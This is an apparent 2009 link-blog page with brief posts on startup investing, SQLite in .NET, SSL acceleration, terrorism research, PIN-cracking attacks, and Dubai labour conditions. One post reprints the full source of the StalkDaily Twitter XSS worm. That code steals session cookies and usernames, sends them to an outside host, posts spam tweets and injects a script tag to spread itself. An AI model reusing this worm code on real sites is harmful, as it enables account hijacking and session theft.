| |
I am a hacker and you are afraid and that makes you more dangerous than I ever could be. |
|
Reid Hoffman: My Rule of Three for Investing |
|
|
Topic: Miscellaneous |
11:20 am EDT, Apr 20, 2009 |
1. How will you reach a massive audience? In real estate the wisdom says “location, location, location.” In consumer Internet, think “distribution, distribution, distribution.” Thousands of products launch every month on hundreds of thousands of new Web pages. How does a company rise above the noise to attract massive discovery and adoption? YouTube did it through existing channels like MySpace, which already reached millions. Yelp had strong SEO, which found them a mass audience searching for restaurants and nightlife. Facebook’s University-centric approach landed them 80% adoption across a campus within 60 days of launch. Every Net entrepreneur should answer these questions: How do we get to one million users? Then how do we get to 10 million users? Then how will you get deep engagement by your users.null
Reid Hoffman: My Rule of Three for Investing |
|
Writing a .NET Wrapper for SQLite |
|
|
Topic: Miscellaneous |
12:30 pm EDT, Apr 18, 2009 |
A couple of weeks ago we posted a tutorial on using SQLite in PHP. I thought I'd expand on that tutorial and demonstrate how to work with SQLite using C# and .NET. In this tutorial, we're going to build a simple wrapper class around the SQLite c/c++ interface.
Writing a .NET Wrapper for SQLite |
|
o3 magazine | Open Source SSL Acceleration |
|
|
Topic: Miscellaneous |
11:22 am EDT, Apr 16, 2009 |
SSL acceleration is a technique that off-loads the processor intensive public key encryption algorithms used in SSL transactions to a hardware accelerator. These solutions often involve a considerable up front investment as the specialized equipment is rather costly. This article though looks at using off the shelf server hardware and open source software to build a cost effective SSL accelerator.
Save for Later o3 magazine | Open Source SSL Acceleration |
|
Knowing the Enemy | George Packer in The New Yorker |
|
|
Topic: Current Events |
6:33 pm EDT, Apr 15, 2009 |
I somehow missed this fantastic "Al'Queda is a scene" roundup from NoteWorthy. George Packer is simply essential. This is a long post because there is no way to boil this down. "After 9/11, when a lot of people were saying, ‘The problem is Islam,’ I was thinking, It’s something deeper than that. It's about human social networks and the way that they operate."
That's David Kilcullen, an Australian lieutenant colonel who may just be our last best hope in the long war. "The Islamic bit is secondary. This is human behavior in an Islamic setting. This is not ‘Islamic behavior.’" “People don’t get pushed into rebellion by their ideology. They get pulled in by their social networks."
In the 1 December issue of Jane's Intelligence Review, John Horgan writes (sub req'd): People who leave terrorist groups or move away from violent roles do so for a multitude of reasons. Horgan explains why greater understanding of the motivations behind this so-called 'disengagement' will help in developing successful anti-terrorism initiatives. The reality is that actual attacks represent only the tip of an iceberg of activity.
Here's the abstract of a recent RAND working paper: In the battle of ideas that has come to characterize the struggle against jihadist terrorism, a sometimes neglected dimension is the personal motivations of those drawn into the movement. This paper reports the results of a workshop held in September 2005 and sponsored by RAND’s Center for Middle East Public Policy and the Initiative for Middle East Youth. Workshop participants discussed the issue of why young people enter into jihadist groups and what might be done to prevent it or to disengage members of such groups once they have joined.
Now, back to the Packer piece: The odd inclusion of environmentalist rhetoric, he said, made clear that “this wasn’t a list of genuine grievances. This was an Al Qaeda information strategy." ... “bin Laden’s message was clearly designed to assist the President’s reëlection.” Bin Laden shrewdly created an implicit association between Al Qaeda and the Democratic Party, for he had come to feel that Bush’s strategy in the war on terror was sustaining his own global importance.
You may recall the speculation that Bush would produce bin Laden's he... [ Read More (0.7k in body) ] Knowing the Enemy | George Packer in The New Yorker |
|
Verizon: Cracking PINs for Fun and Profit |
|
|
Topic: Miscellaneous |
2:36 pm EDT, Apr 15, 2009 |
"We're seeing entirely new attacks that a year ago were thought to be only academically possible," says Sartin. Verizon Business released a report Wednesday that examines trends in security breaches. "What we see now is people going right to the source ... and stealing the encrypted PIN blocks and using complex ways to un-encrypt the PIN blocks." Information about the theft of encrypted PINs first surfaced in an indictment last year against 11 alleged hackers accused of stealing some 40 million debit and credit card details from TJ Maxx and other U.S. retail networks. The affidavit, which accused Albert "Cumbajohnny" Gonzalez of leading the carding ring, indicated that the thieves had stolen "PIN blocks associated with millions of debit cards" and obtained "technical assistance from criminal associates in decrypting encrypted PIN numbers." But until now, no one had confirmed that thieves were actively cracking PIN encryption.
... shit. Information about how to conduct attacks on encrypted PINs isn't new and has been surfacing in academic research for several years. In the first paper, in 2003, a researcher at Cambridge University published information about attacks that, with the help of an insider, would yield PINs from an issuer bank's system.
.... Cambridge? I only know of one group in Cambridge that does this... When you Google "2003 Cambridge University pin" and get a result on Cryptome, you know its gonna be good. I was not disappointed: Decimalisation table attacks for PIN cracking We present an attack on hardware security modules used by retail banks for the secure storage and verication of customer PINs in ATM (cash machine) infrastructures. By using adaptive decimalisation tables and guesses, the maximum amount of information is learnt about the true PIN upon each guess. It takes an average of 15 guesses to determine a four digit PIN using this technique, instead of the 5000 guesses intended. In a single 30 minute lunch-break, an attacker can thus discover approximately 7000 PINs rather than 24 with the brute force method. With a $300 withdrawal limit per card, the potential bounty is raised from $7200 to $2.1 million and a single motivated attacker could withdraw $30{50 thousand of this each day. This attack thus presents a serious threat to bank security.
As Decius and I have said for years, at the bottom of most good security tales you always end up with either Felton or Anderson. :-) The paper also helped me understand (remember?) the significance of the Pin Offset field on ABA track II. (it funny/sad when you google something and come up with your own website. I'm getting old.) Verizon: Cracking PINs for Fun and Profit |
|
Autotuning... but in real life |
|
|
Topic: Miscellaneous |
4:22 pm EDT, Apr 13, 2009 |
This is amazing. Office life would be much better if everyone spoke in autotune. Autotuning... but in real life |
|
Another Ajax powered XSS worm |
|
|
Topic: Miscellaneous |
10:06 pm EDT, Apr 12, 2009 |
An XSS/Ajax worm hit Twitter. But its cool, because Ajax doesn't help amplify XSS attacks right? oh, wait, maybe it does. ;-) Update: Source
function XHConn()
{
var xmlhttp, bComplete = false;
try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) { try { xmlhttp = new XMLHttpRequest(); }
catch (e) { xmlhttp = false; }}}
if (!xmlhttp) return null;
this.connect = function(sURL, sMethod, sVars, fnDone)
{
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET")
{
xmlhttp.open(sMethod, sURL+"?"+sVars, true);
sVars = "";
}
else
{
xmlhttp.open(sMethod, sURL, true);
xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
}
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && !bComplete)
{
bComplete = true;
fnDone(xmlhttp);
}};
xmlhttp.send(sVars);
}
catch(z) { return false; }
return true;
};
return this;
}
function urlencode( str ) {
var histogram = {}, tmp_arr = [];
var ret = str.toString();
var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};
histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
histogram['%20'] = '+';
ret = encodeURIComponent(ret);
for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}
return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
return "%"+m2.toUpperCase();
});
return ret;
}
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
function wait()
{
var content = document.documentElement.innerHTML;
authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);
var randomUpdate=new Array();
randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com";
var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
updateEncode = urlencode(genRand);
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);
Another Ajax powered XSS worm |
|
Topic: Society |
1:48 pm EDT, Apr 11, 2009 |
Johann Hari: All over the city, there are maxed-out expats sleeping secretly in the sand-dunes or the airport or in their cars. "The thing you have to understand about Dubai is – nothing is what it seems," Karen says at last. "Nothing. This isn't a city, it's a con-job." The sheikh did not build this city. It was built by slaves. They are building it now.
I believe this is what you'd call an indictment. Jeff Jarvis: Dubai is either an act of fiction or of the future. I arrived thinking the former; I leave wondering whether it could be the latter.
From the archive, a selection: Dubai threatens to become an instant ruin, an emblematic hybrid of the worst of both the West and the Middle-East and a dangerous totem for those who would mistakenly interpret this as the de-facto product of a secular driven culture.
... it's clear that the emirate will soon be overflowing with attractions ...
Dubai, with its Disneyesque Arab souks in which you can purchase Arab handicrafts or a Cinnabon ...
The company behind some of Dubai's best-known landmarks is considering a stock market listing to raise as much as $15bn to reinforce its finances.
-- Read this now. Back to Johann Hari: The most famous hotel in Dubai – the proud icon of the city – is the Burj al Arab hotel, sitting on the shore, shaped like a giant glass sailing boat.
The dark side of Dubai |
|